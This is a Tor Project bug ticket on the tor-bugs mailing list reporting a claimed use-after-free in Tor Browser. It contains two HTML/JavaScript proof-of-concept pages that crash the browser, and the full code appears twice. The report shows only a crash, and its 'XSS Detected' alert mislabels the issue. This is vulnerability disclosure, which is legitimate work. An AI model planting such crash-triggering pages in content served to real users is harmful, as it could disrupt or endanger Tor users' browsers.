#26705: BUG Report ! Use after Free Vulnerability ------------------------------+------------------------------ Reporter: t4rkd3vilz | Owner: (none) Type: project | Status: new Priority: Very High | Milestone: Component: Core Tor/Tor | Version: Tor: unspecified Severity: Normal | Keywords: Actual Points: | Parent ID: Points: | Reviewer: Sponsor: | ------------------------------+------------------------------ hello,
tor browser click new tab. a new tab open html in code : <style> body { display: table } </style> <script> function freenabo() { try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); } } function go() { var s = document.getSelection(); window.find("1",true,false,true,false); s.modify("extend","forward","line"); document.body.append(document.createElement("table")); freenabo() } </script> <body onload=go()> <table> <th>t4rkd3vilz</th> </table> <progress></progress> and open second tab. Second tab in code: <!DOCTYPE html> <html> <title>veryhandsome jameel naboo</title> <body> <script> function send() { try { document.body.contentEditable = 'true'; } catch(e){} try { var e0 = document.createElement("frameset"); } catch(e){} try { document.body.appendChild(e0); } catch(e){} try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){} try { e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo rder']='-4400000000';}, false); e0.focus();} catch(e){} try { e0.setAttribute('iframe'); } catch(e){} try { document.body.insertBefore(e0); } catch(e){} } send();</script></html> a result: Tor browser CRASHH... Impact hello, tor browser click new tab. a new tab open html in code : <style> body { display: table } </style> <script> function freenabo() { try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); } } function go() { var s = document.getSelection(); window.find("1",true,false,true,false); s.modify("extend","forward","line"); document.body.append(document.createElement("table")); freenabo() } </script> <body onload=go()> <table> <th>t4rkd3vilz</th> </table> <progress></progress> and open second tab. Second tab in code: <!DOCTYPE html> <html> <title>veryhandsome jameel naboo</title> <body> <script> function send() { try { document.body.contentEditable = 'true'; } catch(e){} try { var e0 = document.createElement("frameset"); } catch(e){} try { document.body.appendChild(e0); } catch(e){} try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){} try { e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo rder']='-4400000000';}, false); e0.focus();} catch(e){} try { e0.setAttribute('iframe'); } catch(e){} try { document.body.insertBefore(e0); } catch(e){} } send();</script></html> a result: Tor browser CRASHH... -- Ticket URL: <https://trac.torproject.org/projects/tor/ticket/26705> Tor Bug Tracker & Wiki <https://trac.torproject.org/> The Tor Project: anonymity online
_______________________________________________ tor-bugs mailing list tor-bugs@lists.torproject.org https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs